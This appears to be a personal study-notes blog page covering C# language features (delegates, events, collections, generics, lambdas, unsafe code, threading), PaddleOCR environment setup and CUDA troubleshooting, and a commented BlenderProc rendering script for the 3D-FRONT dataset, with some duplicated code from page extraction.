                                                    {
                                                    ps("Hello World");
                                                    }
                                                    static void Main(string[] args)
                                                    {
                                                    printString ps1 = new printString(WriteToScreen);
                                                    printString ps2 = new printString(WriteToFile);
using System;
using System.IO;

namespace DelegateAppl
{
    class PrintString
    {
        static FileStream fs;
        static StreamWriter sw;
        // Delegate declaration
        public delegate void printString(string s);

        // This method prints to the console
        public static void WriteToScreen(string str)
        {
            Console.WriteLine("The String is: {0}", str);
        }
        // This method prints to a file
        public static void WriteToFile(string s)
        {
            fs = new FileStream("c:\\message.txt", FileMode.Append, FileAccess.Write);
            sw = new StreamWriter(fs);
            sw.WriteLine(s);
            sw.Flush();
            sw.Close();
            fs.Close();
        }
        // This method takes the delegate as a parameter and uses it to call the method
        public static void sendString(printString ps)
        {
            ps("Hello World");
        }
        static void Main(string[] args)
        {
            printString ps1 = new printString(WriteToScreen);
            printString ps2 = new printString(WriteToFile);
            sendString(ps1);
            sendString(ps2);
            Console.ReadKey();
        }
    }
}
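
Not shown in the excerpt above, but closely related: delegate instances of the same type can be combined with +, so a single call invokes every attached method (multicasting). A minimal self-contained sketch of my own, restating a printString-shaped delegate so it runs standalone:

using System;

class MulticastDemo
{
    // Same shape as the printString delegate above
    public delegate void printString(string s);

    static void ToUpper(string s) => Console.WriteLine(s.ToUpper());
    static void ToLower(string s) => Console.WriteLine(s.ToLower());

    static void Main()
    {
        printString ps = ToUpper;
        ps += ToLower;       // combine the two: ps is now a multicast delegate
        ps("Hello World");   // prints HELLO WORLD, then hello world
    }
}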

C# Events

                                                    • C# 事件(Event) | 菜鸟教程 (runoob.com)

Declaring an Event

To declare an event inside a class, you must first declare a delegate type for the event. For example:

public delegate void BoilerLogHandler(string status);

Then declare the event itself, using the event keyword:

// Define the event based on the delegate above
public event BoilerLogHandler BoilerEventLog;

Example

using System;
namespace SimpleEvent
{
    using System;
    /*********** Publisher class ***********/
    public class EventTest
    {
        private int value;

        public delegate void NumManipulationHandler();

        public event NumManipulationHandler ChangeNum;

        protected virtual void OnNumChanged() // virtual so that subclasses (if any) can override it
        {
            if (ChangeNum != null)
            {
                ChangeNum(); /* the event fires: dispatch ChangeNum */
            }
            else
            {
                Console.WriteLine("event not fire");
                Console.ReadKey(); /* press a key to continue */
            }
        }

        public EventTest() // constructor
        {
            int n = 5;
            SetValue(n);
        }

        public void SetValue(int n)
        {
            if (value != n) // only if the value actually changed:
            {
                value = n;
                OnNumChanged();
            }
        }
    }

    /*********** Subscriber class ***********/
    public class subscribEvent
    {
        public void printf()
        {
            Console.WriteLine("event fire");
            Console.ReadKey(); /* press a key to continue */
        }
    }

    /*********** Trigger ***********/
    public class MainClass
    {
        public static void Main()
        {
            EventTest e = new EventTest(); /* instantiate: the constructor runs OnNumChanged() once; no subscriber yet, so no event fires */
            subscribEvent v = new subscribEvent(); /* instantiate the subscriber */
            e.ChangeNum += new EventTest.NumManipulationHandler(v.printf); /* subscribe: when the event is raised, printf() runs */
            e.SetValue(7);
            e.SetValue(11);
            e.SetValue(11); // same value: no change, no event
            e.SetValue(9);
        }
    }
}

                                                      event not fire
                                                      event fire
                                                      event fire
                                                      event fire
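
A side note, not from the source article: since C# 6 the null check in OnNumChanged() is usually written with the null-conditional operator, which is equivalent but shorter. A minimal sketch:

using System;

class NullConditionalDemo
{
    public delegate void NumManipulationHandler();
    public event NumManipulationHandler ChangeNum;

    public void OnNumChanged()
    {
        // Equivalent to: if (ChangeNum != null) ChangeNum();
        ChangeNum?.Invoke();
    }

    static void Main()
    {
        var d = new NullConditionalDemo();
        d.OnNumChanged();   // no subscriber yet: nothing happens, and no exception
        d.ChangeNum += () => Console.WriteLine("event fire");
        d.OnNumChanged();   // prints "event fire"
    }
}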

C# Collections

                                                      • C# 集合(Collection) | 菜鸟教程 (runoob.com)

                                                        List

using System;
using static System.Console;
using System.Collections.Generic;
namespace HelloWorldApplication
{
    class HelloWorld
    {
        static void Main(string[] args)
        {
            var a = new List<int>();
            a.Add(2);
            a.Add(6);
            a.Add(2);
            a.Add(10);
            Console.WriteLine($"The first element is {a[0]}");
            a.Remove(2); // removes the first matching element, i.e. the first 2
            a.Sort();
            foreach (var a2 in a)
            {
                WriteLine(a2);
            }
            bool a3 = a.Contains(2);
            WriteLine(a3);
            Console.ReadKey();
        }
    }
}

The first element is 2
2
6
10
True

Dynamic Array (ArrayList)

                                                        • C# 动态数组(ArrayList) | 菜鸟教程 (runoob.com)

Given the differences above, List<T> is the recommended choice in most cases: it is type-safe, performs better, and scales more cleanly. Consider ArrayList only when working with legacy code or when you need to store objects of different types.

using System;
using System.Collections;

namespace CollectionApplication
{
    class Program
    {
        static void Main(string[] args)
        {
            ArrayList al = new ArrayList();

            Console.WriteLine("Adding some objects:");
            al.Add(45);
            al.Add("A");
            al.Add(33);
            al.Add(56);
            al.Add(true);
            al.Add(23);
            al.Add(9);

            Console.WriteLine("Capacity: {0} ", al.Capacity);
            Console.WriteLine("Count: {0}", al.Count);

            Console.Write("Content: ");
            foreach (var i in al)
            {
                Console.Write(i + " ");
            }
            Console.WriteLine();
            Console.ReadKey();
        }
    }
}

                                                Adding some objects:
                                                Capacity: 8
                                                Count: 7
                                                Content: 45 A 33 56 True 23 9
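
Tying back to the List<T> vs ArrayList comparison above, here is a minimal illustration of the type-safety difference (my own sketch, not from the source article):

using System;
using System.Collections;
using System.Collections.Generic;

class TypeSafetyDemo
{
    static void Main()
    {
        ArrayList al = new ArrayList();
        al.Add(1);        // the int is boxed to object
        al.Add("two");    // compiles: ArrayList accepts any object
        int first = (int)al[0];       // an explicit cast is required
        // int second = (int)al[1];   // also compiles, but throws InvalidCastException at runtime

        List<int> list = new List<int> { 1, 2 };
        int x = list[0];              // no cast, no boxing
        // list.Add("two");           // rejected at compile time
        Console.WriteLine(first + x);
    }
}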

Hashtable

The Hashtable class represents a collection of key/value pairs organized by the hash code of the key; keys are used to access the elements in the collection.

Use a hashtable when you need to access elements by key and can identify a useful key value. Each item in a hashtable is a key/value pair, and the key is used to look the item up.

using System;
using System.Collections;

namespace CollectionsApplication
{
    class Program
    {
        static void Main(string[] args)
        {
            Hashtable ht = new Hashtable();

            ht.Add("001", "Zara Ali");
            ht.Add("002", "Abida Rehman");
            ht.Add("003", "Joe Holzner");
            ht.Add("004", "Mausam Benazir Nur");
            ht.Add("005", "M. Amlan");
            ht.Add("006", "M. Arif");
            ht.Add("007", "Ritesh Saikia");

            if (ht.ContainsValue("Nuha Ali"))
            {
                Console.WriteLine("This student name is already in the list");
            }
            else
            {
                ht.Add("008", "Nuha Ali");
            }
            // Get the collection of keys
            ICollection key = ht.Keys;

            foreach (string k in key)
            {
                Console.WriteLine(k + ": " + ht[k]);
            }
            Console.ReadKey();
        }
    }
}

                                                006: M. Arif
                                                007: Ritesh Saikia
                                                008: Nuha Ali
                                                003: Joe Holzner
                                                002: Abida Rehman
                                                004: Mausam Benazir Nur
                                                001: Zara Ali
005: M. Amlan

Note that the keys come back in hash order, not insertion or sorted order, which is why the output above looks shuffled; the SortedList below keeps its keys sorted.

Dictionary

In C#, the hashtable (Hashtable) and the dictionary (Dictionary) are two different data structures.

In short, although Hashtable and Dictionary overlap in what they can do (both store key/value pairs), Dictionary is usually the better choice in C#, especially where type safety, better performance, and clearer code matter.

using System;
using System.Collections.Generic;
namespace HelloWorldApplication
{
    class A
    {
        static void Main(string[] args)
        {
            var a = new Dictionary<int, int>();
            a.Add(12, 14);
            a.Add(0, 1);
            Console.WriteLine("Count before Remove: " + a.Count);
            a.Remove(0);
            Console.WriteLine(a[12]);
            Console.WriteLine(a.Count);
            Console.WriteLine(a.ContainsKey(12));
            Console.ReadKey();
        }
    }
}

Count before Remove: 2
14
1
True
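
One more minimal sketch, not from the source article: indexing a missing key throws KeyNotFoundException, so the TryGetValue pattern is the usual safe lookup:

using System;
using System.Collections.Generic;

class TryGetValueDemo
{
    static void Main()
    {
        var ages = new Dictionary<string, int> { { "Ann", 30 } };

        // TryGetValue reports success via its return value instead of throwing
        if (ages.TryGetValue("Bob", out int age))
            Console.WriteLine(age);
        else
            Console.WriteLine("Bob not found");
    }
}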

Sorted List (SortedList)

The SortedList class represents a collection of key/value pairs sorted by key; the items can be accessed both by key and by index.

A sorted list is a combination of an array and a hashtable. It contains a list whose items can be reached by key or by index: accessed by index it behaves like a dynamic array (ArrayList), accessed by key it behaves like a hashtable (Hashtable). The items are always kept sorted by key.

using System;
using System.Collections;

namespace CollectionsApplication
{
    class Program
    {
        static void Main(string[] args)
        {
            SortedList sl = new SortedList();

            sl.Add("003", "Joe Holzner");
            sl.Add("001", "Zara Ali");
            sl.Add("004", "Mausam Benazir Nur");
            sl.Add("002", "Abida Rehman");
            sl.Add("107", "Ritesh Saikia");
            sl.Add("006", "M. Arif");
            sl.Add("00A", "M. Amlan");

            if (sl.ContainsValue("Nuha Ali"))
            {
                Console.WriteLine("This student name is already in the list");
            }
            else
            {
                sl.Add("008", "Nuha Ali");
            }

            // Get the collection of keys
            ICollection key = sl.Keys;

            foreach (string k in key)
            {
                Console.WriteLine(k + ": " + sl[k]);
            }
        }
    }
}

                                001: Zara Ali
                                002: Abida Rehman
                                003: Joe Holzner
                                004: Mausam Benazir Nur
                                006: M. Arif
                                008: Nuha Ali
                                00A: M. Amlan
                                107: Ritesh Saikia
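
The example above uses key access only. For the index access mentioned earlier, SortedList also provides GetKey(index) and GetByIndex(index); a minimal sketch of my own, not from the source article:

using System;
using System.Collections;

class SortedListIndexDemo
{
    static void Main()
    {
        SortedList sl = new SortedList();
        sl.Add("002", "Abida Rehman");
        sl.Add("001", "Zara Ali");

        // Items are kept sorted by key, so index 0 is key "001"
        for (int i = 0; i < sl.Count; i++)
        {
            Console.WriteLine("{0}: {1}", sl.GetKey(i), sl.GetByIndex(i));
        }
    }
}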

Stack

A stack (Stack) represents a last-in, first-out collection of objects. Use a stack when you need last-in, first-out access to items: adding an item is called pushing, and removing one is called popping.

using System;
using System.Collections;

namespace CollectionsApplication
{
    class Program
    {
        static void Main(string[] args)
        {
            Stack st = new Stack();

            st.Push('A');
            st.Push('M');
            st.Push('G');
            st.Push('W');

            Console.WriteLine("Current stack: ");
            foreach (char c in st)
            {
                Console.Write(c + " ");
            }
            Console.WriteLine();

            st.Push('V');
            st.Push('H');
            Console.WriteLine("The next poppable value in stack: {0}",
                st.Peek());
            Console.WriteLine("Current stack: ");
            foreach (char c in st)
            {
                Console.Write(c + " ");
            }
            Console.WriteLine();

            Console.WriteLine("Removing values ");
            st.Pop();
            st.Pop();
            st.Pop();

            Console.WriteLine("Current stack: ");
            foreach (char c in st)
            {
                Console.Write(c + " ");
            }
        }
    }
}

                                Current stack:
                                W G M A
                                The next poppable value in stack: H
                                Current stack:
                                H V W G M A
                                Removing values
                                Current stack:
                                G M A

Queue

**A queue (Queue) represents a first-in, first-out collection of objects.** Use a queue when you need first-in, first-out access to items: adding an item is called enqueuing, and removing one is called dequeuing.

                                -
using System;
using System.Collections;

namespace CollectionsApplication
{
    class Program
    {
        static void Main(string[] args)
        {
            Queue q = new Queue();

            q.Enqueue('A');
            q.Enqueue('M');
            q.Enqueue('G');
            q.Enqueue('W');

            Console.WriteLine("Current queue: ");
            foreach (char c in q)
                Console.Write(c + " ");
            Console.WriteLine();
            q.Enqueue('V');
            q.Enqueue('H');
            Console.WriteLine("Current queue: ");
            foreach (char c in q)
                Console.Write(c + " ");
            Console.WriteLine();
            Console.WriteLine("Removing some values ");
            char ch = (char)q.Dequeue();
            Console.WriteLine("The removed value: {0}", ch);
            ch = (char)q.Dequeue();
            Console.WriteLine("The removed value: {0}", ch);
            Console.ReadKey();
        }
    }
}
                                Current queue:
                                A M G W
                                Current queue:
                                A M G W V H
                                Removing some values
                                The removed value: A
                                The removed value: M
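Both examples above use the non-generic System.Collections types, where elements are stored as object and Dequeue() needs a cast. As a side note beyond the original text, the generic System.Collections.Generic equivalents avoid the casts and the boxing; a minimal sketch:

using System;
using System.Collections.Generic;

class GenericCollectionsDemo
{
    static void Main()
    {
        // Stack<T> and Queue<T> are strongly typed: no casts, no boxing
        Stack<char> st = new Stack<char>();
        st.Push('A');
        st.Push('M');
        Console.WriteLine(st.Peek());   // M (top of the stack)

        Queue<char> q = new Queue<char>();
        q.Enqueue('A');
        q.Enqueue('M');
        char ch = q.Dequeue();          // no (char) cast needed
        Console.WriteLine(ch);          // A
    }
}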

BitArray

The BitArray class manages a compact array of bit values, represented as Booleans, where true means the bit is on (1) and false means the bit is off (0).

Use a BitArray when you need to store bits but do not know the number of bits in advance. Items in a BitArray are accessed with a zero-based integer index.

using System;
using System.Collections;

namespace CollectionsApplication
{
    class Program
    {
        static void Main(string[] args)
        {
            // Create two bit arrays of size 8
            BitArray ba1 = new BitArray(8);
            BitArray ba2 = new BitArray(8);
            byte[] a = { 60 };
            byte[] b = { 13 };

            // Store the values 60 and 13 in the bit arrays
            ba1 = new BitArray(a);
            ba2 = new BitArray(b);

            // Contents of ba1
            Console.WriteLine("Bit array ba1: 60");
            for (int i = 0; i < ba1.Count; i++)
            {
                Console.Write("{0, -6} ", ba1[i]);
            }
            Console.WriteLine();

            // Contents of ba2
            Console.WriteLine("Bit array ba2: 13");
            for (int i = 0; i < ba2.Count; i++)
            {
                Console.Write("{0, -6} ", ba2[i]);
            }
            Console.WriteLine();

            BitArray ba3 = new BitArray(8);
            ba3 = ba1.And(ba2);

            // Contents of ba3
            Console.WriteLine("Bit array ba3 after AND operation: 12");
            for (int i = 0; i < ba3.Count; i++)
            {
                Console.Write("{0, -6} ", ba3[i]);
            }
            Console.WriteLine();

            // note: And() above modified ba1 in place (ba1 is now 12),
            // so this OR actually yields 12 | 13 = 13, not 61, as the output below shows
            ba3 = ba1.Or(ba2);
            // Contents of ba3
            Console.WriteLine("Bit array ba3 after OR operation: 61");
            for (int i = 0; i < ba3.Count; i++)
            {
                Console.Write("{0, -6} ", ba3[i]);
            }
            Console.WriteLine();

            Console.ReadKey();
        }
    }
}
                                Bit array ba1: 60
                                False False True True True True False False
                                Bit array ba2: 13
                                True False True True False False False False
                                Bit array ba3 after AND operation: 12
                                False False True True False False False False
                                Bit array ba3 after OR operation: 61
                                True False True True False False False False

In effect, it represents a number's binary form as an array of bool values, with index 0 holding the least significant bit.
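A minimal sketch of my own that makes the bit order explicit: when a BitArray is built from bytes, index 0 is the least significant bit, so 60 (binary 00111100) sets indices 2 through 5.

using System;
using System.Collections;

class BitOrderDemo
{
    static void Main()
    {
        BitArray ba = new BitArray(new byte[] { 60 });
        for (int i = 0; i < ba.Count; i++)
        {
            // prints 0:False 1:False 2:True 3:True 4:True 5:True 6:False 7:False
            Console.Write("{0}:{1} ", i, ba[i]);
        }
        Console.WriteLine();
    }
}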

Generics

**Generics** let you defer specifying the data type of programming elements in a class or method until the point where they are actually used in the program. In other words, generics let you write a class or method that can work with any data type.

You write the specification of the class or method with substitute parameters for the data types. When the compiler encounters a constructor for the class or a call to the method, it generates code to handle the specified data type.

You can define a generic delegate with type parameters. For example:

using System;
using System.Collections.Generic;

delegate T NumberChanger<T>(T n);
namespace GenericDelegateAppl
{
    class TestDelegate
    {
        static int num = 10;
        public static int AddNum(int p)
        {
            num += p;
            return num;
        }

        public static int MultNum(int q)
        {
            num *= q;
            return num;
        }
        public static int getNum()
        {
            return num;
        }

        static void Main(string[] args)
        {
            // Create delegate instances
            NumberChanger<int> nc1 = new NumberChanger<int>(AddNum);
            NumberChanger<int> nc2 = new NumberChanger<int>(MultNum);
            // Call the methods through the delegate objects
            nc1(25);
            Console.WriteLine("Value of Num: {0}", getNum());
            nc2(5);
            Console.WriteLine("Value of Num: {0}", getNum());
            Console.ReadKey();
        }
    }
}
                                Value of Num: 35
                                Value of Num: 175
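Generics apply to classes and methods as well as delegates. As an illustration of my own (not from the tutorial), here is a generic Swap method whose type parameter is inferred at the call site:

using System;

class GenericMethodDemo
{
    // T is inferred from the arguments when Swap is called
    static void Swap<T>(ref T a, ref T b)
    {
        T tmp = a;
        a = b;
        b = tmp;
    }

    static void Main()
    {
        int x = 1, y = 2;
        Swap(ref x, ref y);
        Console.WriteLine("{0} {1}", x, y);   // 2 1

        string s = "hello", t = "world";
        Swap(ref s, ref t);
        Console.WriteLine("{0} {1}", s, t);   // world hello
    }
}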

C# Anonymous Methods

                                • C# 匿名方法 | 菜鸟教程 (runoob.com)

Lambda Expressions

A lambda expression is a concise syntax for creating anonymous functions. They are commonly used in LINQ queries and with delegates.

(parameters) => expression
// or
(parameters) => { statement; }
// Example: define a delegate with a lambda expression
Func<int, int, int> add = (a, b) => a + b;
Console.WriteLine(add(2, 3)); // prints 5

// Example: filter array elements with a lambda expression
// (Where() is a LINQ extension method and needs using System.Linq)
int[] numbers = { 1, 2, 3, 4, 5 };
var evenNumbers = numbers.Where(n => n % 2 == 0);
foreach (var num in evenNumbers)
{
    Console.WriteLine(num); // prints 2 and 4
}

Anonymous Methods

An anonymous method is declared by creating a delegate instance with the delegate keyword.

using System;

delegate void NumberChanger(int n);
namespace DelegateAppl
{
    class TestDelegate
    {
        static int num = 10;
        public static void AddNum(int p)
        {
            num += p;
            Console.WriteLine("Named Method: {0}", num);
        }

        public static void MultNum(int q)
        {
            num *= q;
            Console.WriteLine("Named Method: {0}", num);
        }

        static void Main(string[] args)
        {
            // Create a delegate instance with an anonymous method
            NumberChanger nc = delegate(int x)
            {
                Console.WriteLine("Anonymous Method: {0}", x);
            };

            // Call the delegate bound to the anonymous method
            nc(10);

            // Instantiate the delegate with a named method
            nc = new NumberChanger(AddNum);

            // Call the delegate bound to the named method
            nc(5);

            // Instantiate the delegate with another named method
            nc = new NumberChanger(MultNum);

            // Call the delegate bound to the named method
            nc(2);
            Console.ReadKey();
        }
    }
}
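For reference, running this should print the following (10 passed through the anonymous method, then 10 + 5 = 15, then 15 × 2 = 30):

Anonymous Method: 10
Named Method: 15
Named Method: 30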

In C# 3.0 and later, lambda expressions provide an even more concise syntax for writing anonymous methods.

Using a lambda expression:

using System;

delegate void NumberChanger(int n);

namespace DelegateAppl
{
    class TestDelegate
    {
        static int num = 10;

        public static void AddNum(int p)
        {
            num += p;
            Console.WriteLine("Named Method: {0}", num);
        }

        public static void MultNum(int q)
        {
            num *= q;
            Console.WriteLine("Named Method: {0}", num);
        }

        static void Main(string[] args)
        {
            // Create a delegate instance with a lambda expression
            NumberChanger nc = x => Console.WriteLine($"Lambda Expression: {x}");

            // Call the delegate bound to the lambda expression
            nc(10);

            // Instantiate the delegate with a named method
            nc = new NumberChanger(AddNum);

            // Call the delegate bound to the named method
            nc(5);

            // Instantiate the delegate with another named method
            nc = new NumberChanger(MultNum);

            // Call the delegate bound to the named method
            nc(2);

            Console.ReadKey();
        }
    }
}
                                  Lambda Expression: 10
                                  Named Method: 15
                                  Named Method: 30

C# Unsafe Code

When a code block is marked with the unsafe modifier, C# allows pointer variables to be used inside it. Unsafe code, or unmanaged code, is a code block that uses pointer variables.

At this point it is pretty much C/C++…

using System;
namespace UnsafeCodeApplication
{
    class Program
    {
        static unsafe void Main(string[] args)
        {
            int var = 20;
            int* p = &var;
            Console.WriteLine("Data is: {0} ", var);
            // note: casting a pointer to int truncates on 64-bit platforms;
            // (long)p or (IntPtr)p would be safer
            Console.WriteLine("Address is: {0}", (int)p);
            Console.ReadKey();
        }
    }
}
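Code like this only builds when unsafe support is switched on. A quick sketch of the usual ways to enable it (double-check against your toolchain):

# with the command-line compiler, pass the unsafe flag
csc -unsafe Program.cs

# or, for SDK-style projects, set the property in the .csproj:
#   <PropertyGroup>
#     <AllowUnsafeBlocks>true</AllowUnsafeBlocks>
#   </PropertyGroup>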

C# Multithreading

A **thread** is defined as an execution path of a program. Each thread defines a unique flow of control. If your application involves complex and time-consuming operations, it is often beneficial to set up different execution paths, with each thread performing a specific job.

Threads are lightweight processes. A common use of threads is the implementation of concurrent programming in modern operating systems. Using threads avoids wasting CPU cycles and improves application efficiency.

So far, the programs we have written run as a single process with a single thread of execution, so the application can perform only one task at a time. To perform multiple tasks concurrently, the work can be divided into smaller threads.

using System;
using System.Threading;

namespace MultithreadingApplication
{
    class ThreadCreationProgram
    {
        public static void CallToChildThread()
        {
            try
            {
                Console.WriteLine("Child thread starts");
                // count up to 10
                for (int counter = 0; counter <= 10; counter++)
                {
                    Thread.Sleep(500);
                    Console.WriteLine(counter);
                }
                Console.WriteLine("Child Thread Completed");
            }
            catch (ThreadAbortException)
            {
                Console.WriteLine("Thread Abort Exception");
            }
            finally
            {
                Console.WriteLine("Couldn't catch the Thread Exception");
            }
        }

        static void Main(string[] args)
        {
            ThreadStart childref = new ThreadStart(CallToChildThread);
            Console.WriteLine("In Main: Creating the Child thread");
            Thread childThread = new Thread(childref);
            childThread.Start();
            // pause the main thread for a while
            Thread.Sleep(2000);
            // now abort the child thread
            Console.WriteLine("In Main: Aborting the Child thread");
            childThread.Abort(); // terminates the child thread
            Console.ReadKey();
        }
    }
}
                                  In Main: Creating the Child thread
                                  Child thread starts
                                  0
                                  1
                                  2
                                  In Main: Aborting the Child thread
                                  Thread Abort Exception
                                  Couldn't catch the Thread Exception
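One caveat worth adding: Thread.Abort dates from the .NET Framework era; on .NET Core and .NET 5+ it is obsolete and throws PlatformNotSupportedException. The modern replacement is cooperative cancellation. A minimal sketch of my own, not from the original post:

using System;
using System.Threading;

class CooperativeCancellation
{
    static void Main()
    {
        var cts = new CancellationTokenSource();
        var child = new Thread(() =>
        {
            Console.WriteLine("Child thread starts");
            for (int counter = 0; counter <= 10; counter++)
            {
                // the child checks the token and exits voluntarily
                if (cts.Token.IsCancellationRequested)
                {
                    Console.WriteLine("Child thread cancelled");
                    return;
                }
                Thread.Sleep(500);
                Console.WriteLine(counter);
            }
        });

        child.Start();
        Thread.Sleep(2000);
        Console.WriteLine("In Main: Cancelling the Child thread");
        cts.Cancel();  // request cancellation instead of aborting
        child.Join();  // wait for the child to exit cleanly
    }
}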

Paddle-动手学 OCR

• ~~paddlepaddle CPU build (even Huawei's own staff couldn't get the compute center's NPU working, so CPU it was)~~ still broken. Unbelievable!
                                conda create -n PaddleOCR python=3.7
                                source activate PaddleOCR
                                python -m pip install paddlepaddle==2.4.2 -i https://mirror.baidu.com/pypi/simple
• paddlepaddle GPU build (installed on my own Ubuntu instead), also a bust
                                conda create -n PaddleOCR python=3.7
                                conda activate PaddleOCR
                                python -m pip install paddlepaddle-gpu==2.4.2 -i https://mirror.baidu.com/pypi/simple
• Install paddleocr:
                                pip install --upgrade pip
                                pip install paddleocr
• Install Jupyter Notebook:
                                sudo apt update 
                                sudo apt upgrade
                                sudo apt install python3-pip
                                sudo pip3 install --upgrade pip
                                sudo pip3 install notebook

Run Jupyter Notebook:

                                jupyter notebook

This prints a URL; open it in a browser on the Windows side:


Clone the repository from https://github.com/PaddlePaddle/PaddleOCR, then:

                                cd PaddleOCR
                                pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

4 An Introduction to OCR Technology

4.1 Application Scenarios of OCR

What is commonly called OCR today generally refers to Scene Text Recognition (STR), aimed mainly at natural scenes…

5.2.1 Quick Start

Installation failed under WSL2; my CUDA version is too new.

Install the paddleocr whl package:

                                pip install --upgrade pip
                                pip install paddleocr -i https://pypi.tuna.tsinghua.edu.cn/simple

Invoke the text detection model from the command line to predict the image ./test.jpg:

# --image_dir points to the image to predict; --rec false disables recognition, running text detection only
! paddleocr --image_dir ./test.jpg --rec false

Then you are promptly rewarded with the error ImportError: libcudart.so.10.2: cannot open shared object file: No such file or directory, because my CUDA is 11.5 and has no libcudart.so.10.2.

Download libcudart.so.10.2 from the CSDN post 报错解决:libcudart.so.10.2: cannot open shared object file: No such file or directory (by Love 绘梨衣的 Mr.lu) and put it into the CUDA installation directory.


                                sudo cp -i libcudart.so.10.2 /usr/lib/cuda/lib64

Configure $LD_LIBRARY_PATH:

                                export LD_LIBRARY_PATH=/usr/lib/cuda/lib64:$LD_LIBRARY_PATH
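That export only lasts for the current shell session; to persist it, the usual trick is appending it to the shell profile (assuming ~/.bashrc here):

echo 'export LD_LIBRARY_PATH=/usr/lib/cuda/lib64:$LD_LIBRARY_PATH' >> ~/.bashrc
source ~/.bashrc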

Turns out this machine doesn't even have cuDNN installed?!

Download cuDNN from cuDNN Download | NVIDIA Developer (it has to be the CUDA 10.2 build), which gives cudnn-10.2-linux-x64-v7.6.5.32.tgz; extract it:

                                tar -zxvf cudnn-10.2-linux-x64-v7.6.5.32.tgz 

Then copy these files into the CUDA directory:

                                sudo cp cuda/lib64/* /usr/lib/cuda/lib64
                                sudo cp cuda/include/* /usr/lib/cuda/include/

5.2.2 The DBNet Algorithm in Detail

The DB text detection model can be divided into three parts:


Paper-3D-FRONT-3D Furnished Rooms with layOuts and semaNTics

                                  BlenderProc

      import blenderproc as bproc
      import argparse
      import os
      import numpy as np
1. Parse the command-line arguments:

parser = argparse.ArgumentParser()
parser.add_argument("front", help="Path to the 3D front file")
parser.add_argument("future_folder", help="Path to the 3D Future Model folder.")
parser.add_argument("front_3D_texture_path", help="Path to the 3D FRONT texture folder.")
parser.add_argument("output_dir", help="Path to where the data should be saved")
args = parser.parse_args()
2. Check that the folders exist:

if not os.path.exists(args.front) or not os.path.exists(args.future_folder):
    raise Exception("One of the two folders does not exist!")
3. Initialize:
bproc.init()
4. Load the 3D-FRONT objects:

mapping_file = bproc.utility.resolve_resource(os.path.join("front_3D", "3D_front_mapping.csv"))
mapping = bproc.utility.LabelIdMapping.from_csv(mapping_file)

# set the light bounces
bproc.renderer.set_light_bounces(diffuse_bounces=200, glossy_bounces=200, max_bounces=200,
                                 transmission_bounces=200, transparent_max_bounces=200)

# load the front 3D objects
loaded_objects = bproc.loader.load_front3d(
    json_path=args.front,
    future_model_path=args.future_folder,
    front_3D_texture_path=args.front_3D_texture_path,
    label_mapping=mapping
)

# Init sampler for sampling locations inside the loaded front3D house
point_sampler = bproc.sampler.Front3DPointInRoomSampler(loaded_objects)
5. Initialize the sampler and the BVH tree:

# Init bvh tree containing all mesh objects
bvh_tree = bproc.object.create_bvh_tree_multi_objects([o for o in loaded_objects if isinstance(o, bproc.types.MeshObject)])
6. Sample camera poses in a loop:

poses = 0
tries = 0


def check_name(name):
    for category_name in ["chair", "sofa", "table", "bed"]:
        if category_name in name.lower():
            return True
    return False


# filter some objects from the loaded objects, which are later used in calculating an interesting score
special_objects = [obj.get_cp("category_id") for obj in loaded_objects if check_name(obj.get_name())]

proximity_checks = {"min": 1.0, "avg": {"min": 2.5, "max": 3.5}, "no_background": True}
while tries < 10000 and poses < 10:
    # Sample point inside house
    height = np.random.uniform(1.4, 1.8)
    location = point_sampler.sample(height)
    # Sample rotation (fix around X and Y axis)
    rotation = np.random.uniform([1.2217, 0, 0], [1.338, 0, np.pi * 2])
    cam2world_matrix = bproc.math.build_transformation_mat(location, rotation)

    # Check that obstacles are at least 1 meter away from the camera and have an average
    # distance between 2.5 and 3.5 meters, make sure that no background is visible,
    # and finally make sure the view is interesting enough
    if bproc.camera.scene_coverage_score(cam2world_matrix, special_objects, special_objects_weight=10.0) > 0.8 \
            and bproc.camera.perform_obstacle_in_view_check(cam2world_matrix, proximity_checks, bvh_tree):
        bproc.camera.add_camera_pose(cam2world_matrix)
        poses += 1
    tries += 1
+
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
poses = 0
tries = 0


def check_name(name):
for category_name in ["chair", "sofa", "table", "bed"]:
if category_name in name.lower():
return True
return False


# filter some objects from the loaded objects, which are later used in calculating an interesting score
# 从加载的对象中过滤一些对象,这些对象稍后用于计算有趣的分数
special_objects = [obj.get_cp("category_id") for obj in loaded_objects if check_name(obj.get_name())]

proximity_checks = {"min": 1.0, "avg": {"min": 2.5, "max": 3.5}, "no_background": True}
while tries < 10000 and poses < 10:
# Sample point inside house 房屋内的采样点
height = np.random.uniform(1.4, 1.8)
location = point_sampler.sample(height)
# Sample rotation (fix around X and Y axis) 样品旋转(围绕 X 轴和 Y 轴固定)
rotation = np.random.uniform([1.2217, 0, 0], [1.338, 0, np.pi * 2])
cam2world_matrix = bproc.math.build_transformation_mat(location, rotation)

# Check that obstacles are at least 1 meter away from the camera and have an average distance between 2.5 and 3.5 meters and make sure that no background is visible, finally make sure the view is interesting enough
# 检查障碍物是否距离相机至少 1 米,平均距离在 2.5 到 3.5 米之间,并确保没有可见的背景,最后确保视图足够有趣
if bproc.camera.scene_coverage_score(cam2world_matrix, special_objects, special_objects_weight=10.0) > 0.8 \
and bproc.camera.perform_obstacle_in_view_check(cam2world_matrix, proximity_checks, bvh_tree):
bproc.camera.add_camera_pose(cam2world_matrix)
poses += 1
tries += 1
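
The fixed pitch band is easier to read in degrees; a quick conversion (illustrative only, not part of the original script):

import numpy as np

# the X-Euler limits from the np.random.uniform call above
print(np.degrees([1.2217, 1.338]))  # ≈ [70.0, 76.7]; 90° would be a level camera, so the view tilts roughly 13-20° downward
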
  7. Configure the renderer:

# Also render normals
bproc.renderer.enable_normals_output()
bproc.renderer.enable_segmentation_output(map_by=["category_id"])

  8. Render the whole pipeline:

# render the whole pipeline
data = bproc.renderer.render()

  9. Write the data to an .hdf5 file:

# write the data to a .hdf5 container
bproc.writer.write_hdf5(args.output_dir, data)
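
To sanity-check the result, the written containers can be opened with h5py (a minimal sketch; the file name 0.hdf5 and keys such as "colors" are assumptions about BlenderProc's default output naming):

import h5py

# BlenderProc numbers the containers 0.hdf5, 1.hdf5, ... inside output_dir (assumed here)
with h5py.File("output/0.hdf5", "r") as f:
    for key in f.keys():  # e.g. "colors", "normals", "category_id_segmaps"
        print(key, f[key].shape, f[key].dtype)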


Doesn't seem to be much use, though…


Dataset

  • gt_ctw1500.zip (annotation files for the test-set images, in txt format)
  • Code for visualizing the training-set images:

    import os
    import xml.etree.ElementTree as ET

    import cv2
